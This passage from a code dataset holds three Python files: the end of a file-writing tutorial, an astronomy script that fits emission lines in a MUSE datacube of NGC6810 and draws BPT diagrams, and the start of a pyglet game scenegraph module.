Python\n\"\"\"\n\n#Attempt to read from or write to a closed file will throw ValueError Exception\n\"\"\"\nfo = open(fileName, 'r')\nfo.close()\nfo.read()\nValueError: I/O operation on closed file.\n\"\"\"\n\nlistFruits = ['Apple\\n', 'Orange\\n', 'Guava\\n', 'Mango\\n', 'Peach\\n']\nwith open(fileName, 'a') as fo :\n for f in listFruits :\n fo.write(f)\n\"\"\"\nHello Java\nHello Python\nApple\nOrange\nGuava\nMango\nPeach\n\"\"\"\n","repo_name":"vrrohan/Python100DaysOfCode","sub_path":"Day17-WorkingWithFiles/Py5-WriteFilesWith.py","file_name":"Py5-WriteFilesWith.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42130278067","text":"#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 10 19:58:08 2023\n\n@author: tauro\n\"\"\"\n\n\n# import python libraries\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport astropy.io.fits as fits\nimport astropy.wcs as wcs\nimport os \nimport time\n#from astropy.nddata import Cutout2D\nfrom scipy import ndimage\nimport astropy.constants as K\nimport astropy.units as u\nfrom astropy.cosmology import Planck15 as p15\nimport scipy.ndimage\nfrom lmfit import minimize, Parameters, report_fit\nfrom heapq import nlargest\nimport scipy.interpolate\nimport matplotlib.colors as mcolors\n\n\n\n#----------------------------------------------------------------------------\n\ndef residual(pars, x, p, data=None, sigma=None):\n ## Multi-Gaussian model\n # model1/model1z/model2z are only computed for p == 3; keep placeholders\n # so the data-is-None return below cannot raise a NameError for other p\n model1 = model1z = model2z = None\n\n if p == 1:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n model = pars['amp_g1'] * np.exp(-argu1) + pars['C_g1']\n if p == 2:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2'] * np.exp(-argu2)) + pars['C_g2']\n if p == 3:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3'] * np.exp(-argu3)) + pars['C_g3']\n model1 = pars['C_g3'] + pars['amp_g1'] * np.exp(-argu1)\n model1z = pars['amp_g1'] * np.exp(-argu1)\n model2z = pars['amp_g3'] * np.exp(-argu3)\n if p == 4:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4)) + pars['C_g4']\n if p == 5:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n argu5 = (x - pars['cen_g5'])**2 / (2*(pars['wid_g5'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4) + pars['amp_g5']*np.exp(-argu5)) + pars['C_g5']\n \n if data is None:\n return model, model1, model1z, model2z\n if sigma is None:\n return model - data\n return (model - data) / sigma \n\n#----------------------------------------------------------------------------\n\n##FUNCTIONS TO MAKE THE SPIRAL GRID FOR FITTING\ndef invers_spiral(A):\n return A[::-1] # inverting the array, so it starts from the center \n\ndef spiral_mat_to_vect(A):\n v = []\n while(A.size != 0):\n v.append(A[0,:])\n A = A[1:,:].T[::-1]\n return np.concatenate(v)\n\ndef spiral_vect_to_mat(v):\n L = int(np.sqrt(v.size)) # length of the piece to add\n l = L\n A = np.zeros((L,L))\n i = 3 # starting from 3, so in this way the x coordinate will increase on the second step \n x = 0 # x coordinate of the new piece\n y = 0 # y coordinate of the new piece\n \n A[x,y:l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n\n while(v.size != 0):\n i += 1 # In every step: rotate and fill the first row of the matrix\n if i % 2 == 0: # Every 2 rotations l decreases\n l -= 1\n if (i + 1) % 4 == 0: # Every 4 rotations x increases\n 
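# a full lap of the spiral is complete here, so the write row moves one ring inward\n 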
x += 1\n if i % 4 == 0: # Every 4 rotations y increases with a delay of 1 step compared to x\n y += 1\n A[x,y:y+l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n \n for rotations in range(i % 4): # The last rotations to have the matrix rotated in the correct way\n A = A.T[::-1]\n \n return A\n\n#---------------------------------------------------------------------------- \n\npath = os.path.dirname(os.path.abspath('__file__'))\n\n# Open and managing the datacubes\nfilefits_data = 'NGC6810_Data.fits'\ndatacube = fits.open(path+'/file/Muse/'+filefits_data)[0]\nNz,Ny,Nx = datacube.shape\nprint (Nz, Ny, Nx)\n\n\n# define the z-axis which corresponds to frequency\nnaxis3 = datacube.header['NAXIS3']\ncrpix3 = datacube.header['CRPIX3'] # reference pixel\ncrval3 = datacube.header['CRVAL3'] # angstrom (Starting wavelenght)\ncdelt3 = datacube.header['CD3_3'] # wavelenght increment\n\nkk = 1+np.arange(naxis3)\n \nwavelenght = crval3+cdelt3*(kk-crpix3) #A\nwavelenght_m = (wavelenght / 1e10 ) * u.m\n\nwavelenght_beta = wavelenght_m[8:98]\nwavelenght_O = wavelenght_m[110:210]\nwavelenght_alpha = wavelenght_m[1400:1500]\n\nfrequency = K.c.to('m s-1') / wavelenght_m #Hz\nfrequency = 1 * frequency.to('THz')\n\nfrequency_beta = frequency[8:98]\nfrequency_O = frequency[110:210]\nfrequency_alpha = frequency[1400:1500]\n\n\n\n\n# define the z-axis in velocity units \n# average frequency\nfrequency_mean = np.mean(frequency)\nprint(frequency_mean)\n\n\n# z = v/c = (nu_emit - nu_obs)/nu_obs \nvelocity_unit = ((frequency_mean- (frequency))/(frequency))*K.c.to('km/s')\nvelocity_beta = (((612.604172*u.THz - (frequency_beta))/(frequency_beta))*K.c.to('km/s')).value\nvelocity_O = (((594.850769*u.THz - (frequency_O))/(frequency_O))*K.c.to('km/s')).value\nvelocity_alpha = ((( 453.778836*u.THz - (frequency_alpha))/(frequency_alpha))*K.c.to('km/s')).value\nprint(velocity_unit[:10])\nvelocity = velocity_unit.value\nprint(velocity[:10])\ndv = np.abs(velocity[1]-velocity[0])\ndlambda = np.abs(wavelenght[1]-wavelenght[0])\n\n#----------------------------------------------------------------------------\n\n# TOTAL SPECTRUM\n# location of the target\nx0,y0 = 155, 150\n# size of the square aperture \ndl = 80\n# extract the spectrum\nspectrum = np.nansum(datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl],axis = (1,2))\n\n# 0plot: Wavelenght - Spectrum\nplt.figure(figsize = (12,4))\nplt.plot(wavelenght, spectrum, label = 'data')\nplt.plot(wavelenght,wavelenght*0,':',color = 'black')\nplt.xlabel('wavelenght [A°]')\nplt.ylabel('flux ')\nplt.title('Total Spectrum')\nplt.legend()\nplt.show()\n\n# 1plot: frequency - spectrum\nplt.figure(figsize = (12,4))\nplt.plot(frequency, spectrum, label = 'data')\nplt.plot(frequency,frequency*0,':',color = 'black')\nplt.xlabel('frequency [THz]')\nplt.ylabel('flux ')\nplt.title('Total Spectrum')\nplt.legend()\nplt.show()\n\n\n\n# # 2plot: velocity - spectrum\n# plt.figure(figsize = (12,4))\n# plt.plot(velocity, spectrum, label = 'data')\n# plt.plot(velocity,frequency*0,':',color = 'black')\n# plt.xlabel('velocity [km/s]')\n# plt.ylabel('flux ')\n# plt.title('Totale Spectrum (function of velocity)')\n# plt.legend()\n# plt.show()\n\n#----------------------------------------------------------------------------\n\n## RMS DETERMINATION WITH THE POWER RESPONSE \n\n# Choosing an empty region\nx0, y0 = 280, 30\ndl = 15\nnoise = datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl]\nerror_beta = np.std(noise[8:98,:,:])\nerror_O = np.std(noise[ 110:210,:,:])\nerror_alpha = np.std(noise[1400:1500, :, :])\nerror_tot = np.std(noise[:, :, 
:])\n\nprint(\"rms = {:2f} mJy\".format(error_alpha))\nprint(\"####################\")\n\n#----------------------------------------------------------------------------\n\n# Fit and plot of the total spectrum\n# First Line: H_beta 4862\n# Doublet O_III 4960 - 5008\n# Doublet N_II 6549-6585 + H_alpha 6564\nx = wavelenght\ndata = spectrum\np = 3\n\nfit_params = Parameters()\nfit_params.add('amp_g1', value=2e6,)\nfit_params.add('cen_g1', value=4862.68)\nfit_params.add('wid_g1', value=100)\nfit_params.add('C_g1', value=1e5,)\nfit_params.add('amp_g2', value=1e6,)\nfit_params.add('cen_g2', value=5000)\nfit_params.add('wid_g2', value=200)\nfit_params.add('C_g2', value=1e5,)\nfit_params.add('amp_g3', value=8e6,)\nfit_params.add('cen_g3', value=6560)\nfit_params.add('wid_g3', value=200)\nfit_params.add('C_g3', value=1e5,)\n\n\nout = minimize(residual, fit_params, args=(x,p,), kws={'data': data})\nfit, fit1, fit1z, fit2z = residual(out.params, x, p)\nprint('##')\nprint('Total_Spectrum_fit')\nreport_fit(out)\nparvals = out.params.valuesdict()\nstddev_t = parvals['wid_g1']\nprint(\"FWHM = {:2f} km/s\".format(2.355*stddev_t))\n\n\nbic_1g = out.bic #Bayesian Crit Info for the fit with 1 Gaussian\n\nplt.figure(figsize = (12,4))\nplt.plot(x, data, label='data')\nplt.plot(x, data*0,':',color = 'black')\nplt.plot(x, fit, label='best fit')\nplt.xlabel('Wavelenght [A°]')\nplt.ylabel('flux [Jy]')\nplt.title('Total Spectrum fit with 3 gaussians')\nplt.legend()\nplt.show()\n\ndel(x, fit, fit1, fit1z, fit2z)\n#----------------------------------------------------------------------------\n\n# Making 3 different subcubes for the 3 part of the fit (H_beta, O_III doublet, H_alpha e NII doublet)\n\n#H_beta\n\nO_III = datacube.data[8:98, :, :]\nw_beta = wavelenght[8:98]\nO_III = datacube.data[110:210, :, :]\nw_O = wavelenght[110:210]\nH_alpha = datacube.data[1400:1500, :, :]\nw_alpha = wavelenght[1400:1500]\n\n\n#----------------------------------------------------------------------------\n\nmod = fits.open(path + '/1mod.fits')[0].data\nmod_alpha_t = fits.open(path + '/2modalpha.fits')[0].data\nflux_H_alpha = fits.open(path + '/flux_map_H_definitive.fits')[0].data\nvel_map = fits.open(path + '/4vel_H.fits')[0].data\nvdisp_map =fits.open(path + '/5disp_H.fits')[0].data\namperr =fits.open(path + '/6amperr_H.fits')[0].data\nvelerr = fits.open(path + '/7velerr_H.fits')[0].data\ndisperr = fits.open(path + '/8disperr_H.fits')[0].data \nflux_NII = fits.open(path + '/9flux_map_N.fits')[0].data\nflux_OIII = fits.open(path + '/moments_map/NGC6810_MUSE/O_III/flux_map_O_5008_spiral_3_1gxNGC6810_MUSE_OIII.fits')[0].data\nflux_H_beta = fits.open(path + '/moments_map/NGC6810_MUSE/H_beta/flux_map_spiral_4_1gxNGC6810_MUSE_H_beta_clean.fits')[0].data\n\nflux_H_alpha *= 1e-20\nflux_H_beta *= 1e-20\nflux_NII *= 1e-20\nflux_OIII *= 1e-20\n# Plot \nplt.figure(figsize = (14,9))\n\nplt.subplot(221)\nplt.imshow(flux_H_alpha, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('H_alpha')\nplt.subplot(222)\nplt.imshow(flux_NII, origin = 'lower', cmap ='jet')\nplt.colorbar(shrink = 0.7, label='Flux [Jy]')\nplt.title('N_II')\nplt.subplot(223)\nplt.imshow(flux_OIII, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('O_III')\nplt.subplot(224)\nplt.imshow(flux_H_beta, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('H_beta')\nplt.suptitle('Flux Maps')\nplt.show()\n\n\nmask1 = ~np.isnan(flux_H_alpha) \nmask2 = 
~np.isnan(flux_NII)\nmask3 = ~np.isnan(flux_OIII)\nmask4 = ~np.isnan(flux_H_beta)\nmask = mask1 * mask2 * mask3 * mask4\nmap_x = np.full_like(flux_H_alpha, np.nan)\nmap_y = np.full_like(flux_H_alpha, np.nan)\nmap_x = np.log10(flux_NII/flux_H_alpha)\nmap_y = np.log10(flux_OIII /flux_H_beta)\nx = np.log10(flux_H_alpha[mask] /flux_NII[mask])\ny = np.log10(flux_OIII[mask] /flux_H_beta[mask])\nlog_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\n\n\n\n\n\n\n\n# Below are listed the demarcations summarized by Kewley et al 2006 for each diagram:\n# 1) BPT-NII:\n# log([OIII]/Hb) = 0.61 / (log([NII]/Ha) - 0.05) + 1.3 (Kauffmann+03 line)\n# log([OIII]/Hb) = 0.61 / (log([NII]/Ha) - 0.47) + 1.19 (Kewley+01 line)\n# 2) BPT-SII:\n# log([OIII]/Hb) = 0.72 / (log([SII]/Ha) - 0.32) + 1.30 (main AGN line)\n# log([OIII]/Hb) = 1.89 log([SII]/Ha) + 0.76 (LINER/Sy2 line)\n# 3) BPT-OI:\n# log([OIII]/Hb) = 0.73 / (log([OI]/Ha) + 0.59) + 1.33 (main AGN line)\n# log([OIII]/Hb) = 1.18 log([OI]/Ha) + 1.30 (LINER/Sy2 line)\n\nlog_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\n\ndef bpt_nii(log_nii_ha, relation = 'both'):\n log_nii_ha_k03 = np.copy(log_nii_ha)\n log_nii_ha_k03[log_nii_ha_k03>= 0.05] = 0.04\n log_nii_ha_k01 = np.copy(log_nii_ha)\n log_nii_ha_k01[log_nii_ha_k01>= 0.47] = 0.46\n kauffmann03 = 0.61 / (log_nii_ha_k03 - 0.05) + 1.3\n kewley01 = 0.61 / (log_nii_ha_k01 - 0.47) + 1.19\n #kauffman < kewley\n log_oiii_ha = np.asarray([kauffmann03,kewley01])\n return log_oiii_ha\ndef pbt(x_ratio, y_ratio, diagram = 'nii', quiet = True):\n '''\n Parameters\n ----------\n x_ratio : array\n log10([OIII]/Hb)\n y_ratio : array\n log10([NII]/Ha) o\n diagram : strinf, optional\n select the PBT diagram to use for the selection.\n The default is 'nii’.\n quiet : TYPE, optional\n DESCRIPTION. 
The default is True.\n    Returns\n    -------\n    bpt_type : array\n        return the BPT classification\n        0: SF\n        1: mixed\n        2: AGN\n    '''\n    if diagram == 'nii':\n        y1_ratio, y2_ratio = bpt_nii(x_ratio, relation = 'both')\n        sel_kauffmann03 = y_ratio>y1_ratio\n        sel_kewley01 = y_ratio>y2_ratio\n        bpt_type = sel_kauffmann03.astype(int)+sel_kewley01.astype(int)\n        return bpt_type\ndef PBTdiagrams(oiiihb,niiha, siiha,oiha, color = 'blue',\n                ax= None):\n#    ax.subplot(131)\n#    p1 = plt.scatter(niihaN,oiiihbN, color = 'orange', label = 'narrow')\n    ax[0].scatter(niiha, oiiihb ,c = color)#,color = 'blue', label = 'broad'\n    x = np.linspace(-2,1,100)\n    y1 = 0.61/(x-0.47)+1.19\n    y1[x>=0.47]=-12\n    y2 = 0.61/(x-0.05)+1.3\n    y2[x>=0.05]=-12\n    ax[0].plot(x,y1, color='black')\n    ax[0].plot(x,y2, color='black', linestyle='--')\n    ax[0].set_xlabel(r'Log([NII]6584/H$\\alpha$)')\n    ax[0].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n    ax[0].set_xlim(-1.5,0.8)\n    ax[0].set_ylim(-0.4,1.2)\n#    ax.subplot(132)\n    ax[1].scatter(siiha, oiiihb, c = color)#,color = 'blue'\n    ax[1].set_xlim(-1.5,0.6)\n    ax[1].set_ylim(-0.4,1.2)\n    x = np.linspace(-2,1,100)\n    y1 = 0.72/(x-0.32)+1.30\n    y1[x>=0.32]=-12\n    y2 = 1.89*x+0.76\n    y2[y2<=y1]=y1[y2<=y1]\n    ax[1].set_xlabel(r'Log([SII]6717+6731/H$\\alpha$)')\n    ax[1].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n    ax[1].plot(x,y1, color='black')\n    ax[1].plot(x,y2, color='black', linestyle='--')\n#    ax.subplot(133)\n#    plt.scatter(oihaN,oiiihbN, color = 'orange')\n    ax[2].scatter(oiha, oiiihb, c = color)#,color = 'blue') # put a list of ones in place of oiha\n    x = np.linspace(-3,1,100)\n    y1 = 0.73/(x+0.59)+1.33\n    y1[x>=-0.59]=-12\n    y2 = 1.18*x+1.30\n    y2[y2<=y1]=y1[y2<=y1]\n    ax[2].set_xlabel(r'Log([OI]6300/H$\\alpha$)')\n    ax[2].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n    ax[2].plot(x,y1, color='black')\n    ax[2].plot(x,y2, color='black', linestyle='--')\n    ax[2].set_xlim(-2.5,-0.0)\n    ax[2].set_ylim(-0.4,1.2)\n\n#    log_nii_ha = np.arange(-2,1,0.1)\n#    y1,y2 = bpt_nii(log_nii_ha, relation = 'both')\n#    log_nii_ha_obs = np.asarray([0.5,-0.4,-1])\n#    log_oiii_hb_obs = np.asarray([1,0.4,0.4])\n#    print(pbt(log_nii_ha_obs,log_oiii_hb_obs))\n#    plt.plot(log_nii_ha,y1)\n#    plt.plot(log_nii_ha,y2)\n#    plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\n#    plt.ylim(-0.5,1.2)\n\n\n\n\nlog_nii_ha = np.arange(-2,1,0.1)\ny1,y2 = bpt_nii(log_nii_ha, relation = 'both')\nlog_nii_ha_obs = np.asarray([0.5,-0.4,-1])\nlog_oiii_hb_obs = np.asarray([1,0.4,0.4])\nprint(pbt(log_nii_ha_obs,log_oiii_hb_obs))\nplt.plot(log_nii_ha,y1)\nplt.plot(log_nii_ha,y2)\nplt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-0.5,1.2)\n\n\n\nmask1 = ~np.isnan(flux_H_alpha) \nmask2 = ~np.isnan(flux_NII)\nmask3 = ~np.isnan(flux_OIII)\nmask4 = ~np.isnan(flux_H_beta)\nmask = mask1 * mask2 * mask3 * mask4\nx = np.log10(flux_NII[mask]/flux_H_alpha[mask] )\ny = np.log10(flux_OIII[mask] /flux_H_beta[mask])\n\n# log_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\nbpttypes = pbt(x, y)\nsfmask = np.zeros_like(bpttypes)\nsfmask[bpttypes == 0] = True\nmixedmask = np.zeros_like(bpttypes)\nmixedmask [bpttypes == 1 ] = True\nagnmask = np.zeros_like(bpttypes)\nagnmask [bpttypes == 2 ] = True\n\n\nplt.figure(figsize = (14,10))\nplt.scatter(x, y, label='data', marker = '.')\nplt.xlabel('$log_{10}$([$N_{II}$]/[$H_{alpha}$])')\nplt.ylabel('$log_{10}$([$O_{III}$]/[$H_{beta}$])')\nplt.title('BPT Diagram')\nplt.plot(log_nii_ha,y1, 'o-', color='red')\nplt.plot(log_nii_ha,y2,'o-', color='orange')\n# 
plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-2,2)\nplt.xlim(-2, 1)\nplt.legend()\nplt.show()\n\n# plt.figure(figsize = (14,10))\n# plt.scatter(x[sfmask], y[sfmask], label='SF', marker = '.', color= 'blue')\n# plt.scatter(x[mixedmask], y[mixedmask], label='Mixed', marker = '.', color='green')\n# plt.scatter(x[agnmask], y[agnmask], label='AGN', marker = '.', color='red')\n# plt.xlabel('log10([H_alpha]/[N_II])')\n# plt.ylabel('log10([O_III]/[H_beta])')\n# plt.title('BPT Diagram')\n# plt.plot(log_nii_ha,y1, 'o-', color='red')\n# plt.plot(log_nii_ha,y2,'o-', color='orange')\n# # plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\n# plt.ylim(-2,2)\n# plt.xlim(-2, 1)\n# plt.legend()\n# plt.show()\n\n\n#prepare for masking arrays - 'conventional' arrays won't do it\ny_values = np.ma.array(y)\n#mask values below a certain threshold\ny_sf = np.ma.masked_where(bpttypes < 0 , y_values)\ny_mixed = np.ma.masked_where(bpttypes < 1 , y_values)\ny_agn = np.ma.masked_where(bpttypes < 2 , y_values)\n\nplt.figure(figsize = (14,10))\nplt.scatter(x, y_sf, label='SF', marker = '.', color= 'blue')\nplt.scatter(x, y_mixed, label='Mixed', marker = '.', color='green')\nplt.scatter(x, y_agn, label='AGN', marker = '.', color='red')\nplt.xlabel('$log_{10}$([$N_{II}$]/[$H_{alpha}$])')\nplt.ylabel('$log_{10}$([$O_{III}$]/[$H_{beta}$])')\nplt.title('BPT Diagram')\nplt.plot(log_nii_ha,y1, 'o-', color='orange', label = 'kauffmann03')\nplt.plot(log_nii_ha,y2,'s-', color='black', label = 'kewley01')\n# plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-2,2)\nplt.xlim(-2, 1)\nplt.legend()\nplt.show()\n\n\n#Remapping the bpt diagram on the galaxy\n\nmask_map = np.ma.array(map_y)\nlog_nii_ha_k03 = np.copy(map_x)\nlog_nii_ha_k03[log_nii_ha_k03>= 0.05] = 0.04\nlog_nii_ha_k01 = np.copy(map_x)\nlog_nii_ha_k01[log_nii_ha_k01>= 0.47] = 0.46\nkauffmann03 = y1_ratio = 0.61 / (log_nii_ha_k03 - 0.05) + 1.3\nkewley01 = y2_ratio = 0.61 / (log_nii_ha_k01 - 0.47) + 1.19\ncond1 = map_y < y1_ratio\ncond2 = (map_y > y1_ratio) * (map_y < y2_ratio)\ncond3 = map_y > y2_ratio\nmap_sf = np.ma.masked_where(cond1 , mask_map)\nmap_mixed = np.ma.masked_where(cond2, mask_map)\nmap_agn = np.ma.masked_where(cond3, mask_map)\n\n# map_sf = np.ma.masked_where((map_y < y1_ratio).any , mask_map)\n# map_mixed = np.ma.masked_where((map_y > y1_ratio).any and (map_y < y2_ratio).any, mask_map)\n# map_agn = np.ma.masked_where((map_y > y2_ratio).any, mask_map)\n\nmap_sf = 1.0 * np.ones_like(map_y)\nmap_sf[cond1 == False] = np.nan\nmap_mixed = 1.0 * np.ones_like(map_y)\nmap_mixed[cond2 == False] = np.nan\nmap_agn = 1.0 * np.ones_like(map_y)\nmap_agn[np.where(cond3 == False)] = np.nan\n\n#Plot\n\nplt.figure(figsize = (14,9))\n\ntest = 1* cond3\nplt.imshow(flux_H_alpha, origin='lower', cmap = 'gray', alpha = 0.1)\nplt.imshow(map_sf, origin = 'lower', cmap = 'Blues',interpolation = 'none')\nplt.colorbar(shrink = 0.7, label = 'SF')\nplt.imshow(map_mixed, origin = 'lower', cmap ='Greens',interpolation = 'none')\nplt.colorbar(shrink = 0.7, label='Mixed')\nplt.imshow(map_agn, origin = 'lower', cmap = 'Reds', interpolation = 'none')\nplt.colorbar(shrink = 0.7, label = 'AGN')\nplt.title('BPT Diagram projected on the Galaxy')\nplt.show()\n\n\n# --------------------------------------------------\n# # Saving the data\n \n# hdu = fits.PrimaryHDU(mod)\n# hdul = fits.HDUList([hdu])\n# hdul.writeto('1mod.fits', overwrite = True)\n# 
#----------------------------------------------------------------------------\n\n","repo_name":"taurosss/Galaxy_outflow_final","sub_path":"bpt_diagram.py","file_name":"bpt_diagram.py","file_ext":"py","file_size_in_byte":19929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16153426952","text":"import os\nimport json\nimport math\n\nimport pyglet\nfrom pyglet import gl\nimport pyglet.image.atlas\n\nfrom itertools import chain\n\nfrom ..geom import Rect, v\n\nfrom pkg_resources import resource_filename, resource_stream\n\n\ndef _texture_atlas_add(self, img):\n \"\"\"Monkey patch pyglet to pad the texture atlas to remove adjacency artifacts.\n\n Taken from http://markmail.org/message/qn65kjlieq6n333k\n \"\"\"\n pad = 1\n x, y = self.allocator.alloc(img.width + pad * 2, img.height + pad * 2)\n self.texture.blit_into(img, x + pad, y + pad, 0)\n region = self.texture.get_region(x + pad, y + pad, img.width, img.height)\n return region\n\npyglet.image.atlas.TextureAtlas.add = _texture_atlas_add\n\n\npyglet.resource.path += [\n resource_filename('wildwest', 'assets/sprites/'),\n resource_filename('wildwest', 'assets/textures/'),\n]\npyglet.resource.reindex()\n\n\nclass Camera(object):\n \"\"\"A camera object.\"\"\"\n def __init__(self, offset, screen_w, screen_h):\n self.near = 1.0\n self.focus = 800.0 # the plane our 2D scene is mainly on\n self.far = 10000.0\n self.screen_w = screen_w\n self.screen_h = screen_h\n self.offset = v(offset)\n\n def get_plane_rect(self, depth):\n \"\"\"Get the rectangle of a plane perpendicular to the view direction,\n a distance depth from the camera.\"\"\"\n scale = depth / self.focus\n x, y = self.offset\n\n # The extra 1/1.01 is to cover the distance from the centre of the\n # outside pixels to the edge of the frustum\n sw = self.screen_w + 1.001\n sh = self.screen_h + 1.001\n\n return Rect(\n x + scale * -0.5 * sw,\n x + scale * 0.5 * sw,\n y + scale * -0.5 * sh,\n y + scale * 0.5 * sh\n )\n\n def get_left_plane(self, depth):\n scale = depth / self.focus\n x = self.offset.x\n\n # The extra 1/1.01 is to cover the distance from the centre of the\n # outside pixels to the edge of the frustum\n sw = self.screen_w + 1.001\n return x + scale * -0.5 * sw\n\n def far_plane(self):\n \"\"\"Get the rectangle of the back plane\"\"\"\n return self.get_plane_rect(self.far)\n\n def near_plane(self):\n \"\"\"Get the rectangle of the near plane\"\"\"\n return self.get_plane_rect(self.near)\n\n def viewport(self):\n \"\"\"Get the rectangle of the near plane\"\"\"\n x, y = self.offset\n return Rect(\n x + -0.5 * self.screen_w,\n x + 0.5 * self.screen_w,\n y + -0.5 * self.screen_h,\n y + 0.5 * self.screen_h,\n )\n\n def setup_matrixes(self):\n x, y = self.offset\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n# fov = math.atan(self.screen_h * 0.5 / self.focus)\n# aspect = self.screen_w * 1.0 / self.screen_h\n# gl.gluPerspective(fov, aspect, self.near, self.far)\n l = -0.5 * self.screen_w / (self.focus - self.near)\n r = -l\n b = -0.5 * self.screen_h / (self.focus - self.near)\n t = -b\n self.np = Rect(l, r, b, t)\n gl.glFrustum(l, r, b, t, self.near, self.far)\n gl.glMatrixMode(gl.GL_MODELVIEW)\n gl.glLoadIdentity()\n gl.glTranslatef(-x, -y, -self.focus)\n\n\nclass Node(object):\n \"\"\"Base class for scenegraph objects.\"\"\"\n z = 0\n scenegraph = None\n\n def set_scenegraph(self, scenegraph):\n self.scenegraph = scenegraph\n\n\nclass CompoundNode(Node):\n def __init__(self, pos=(0, 0), children=()):\n 
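# children are re-sorted by z on every draw() call, so the order passed here\n        # only matters for nodes that share the same z (Python's sort is stable)\n        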
self.pos = v(pos)\n self.children = []\n for c in children:\n self.add_child(c)\n self.build()\n\n def set_scenegraph(self, scenegraph):\n self.scenegraph = scenegraph\n for c in self.children:\n c.set_scenegraph(scenegraph)\n\n def build(self):\n \"\"\"Subclasses can override this to populate the node.\"\"\"\n\n def add_child(self, c):\n assert isinstance(c, Node), '%r is not a Node' % c\n c.set_scenegraph(self.scenegraph)\n self.children.append(c)\n\n def remove_child(self, c):\n c.set_scenegraph(None)\n self.children.remove(c)\n\n def draw(self, camera):\n self.children.sort(key=lambda x: x.z)\n gl.glPushMatrix()\n gl.glTranslatef(self.pos.x, self.pos.y, 0)\n for c in self.children:\n c.draw(camera)\n gl.glPopMatrix()\n\n\nclass SpriteNode(Node):\n def __init__(self, pos, animation, z=0):\n self.z = z\n self.sprite = pyglet.sprite.Sprite(animation)\n self.pos = v(pos)\n\n def get_position(self):\n return self._pos\n\n def set_position(self, pos):\n self._pos = pos\n self.sprite.position = pos\n\n pos = property(get_position, set_position)\n\n def draw(self, camera):\n self.sprite.draw()\n\n\nclass StaticImage(SpriteNode):\n def __init__(self, pos, img, z=-1):\n im = pyglet.resource.image(img)\n super(StaticImage, self).__init__(pos, im, z)\n\n\nclass FloatyImage(StaticImage):\n \"\"\"An image that bounces up and down in space, in typical power-up fashion.\"\"\"\n def draw(self, camera):\n gl.glPushMatrix()\n gl.glTranslatef(0, 6 * math.sin(5 * self.scenegraph.t), 0)\n super(FloatyImage, self).draw(camera)\n gl.glPopMatrix()\n\n\nclass FadeyImage(StaticImage):\n \"\"\"An image that fades out over time.\"\"\"\n opacity = 0\n t = None\n\n def show(self):\n self.opacity = 1\n self.t = None\n\n def draw(self, camera):\n if self.t is None:\n self.t = self.scenegraph.t\n else:\n self.opacity = max(0, self.opacity - (self.scenegraph.t - self.t) * 0.5)\n if self.opacity == 0:\n self.scenegraph.remove(self)\n return\n self.t = self.scenegraph.t\n self.sprite.opacity = int(self.opacity * 255)\n super(FadeyImage, self).draw(camera)\n\n\n\nclass Animation(SpriteNode):\n \"\"\"Node that loads multiple animations from a JSON file.\n\n The current animation can be changed using .play()\n \"\"\"\n loaded = {}\n\n def __init__(self, fname, pos, z=0):\n self.flip_x 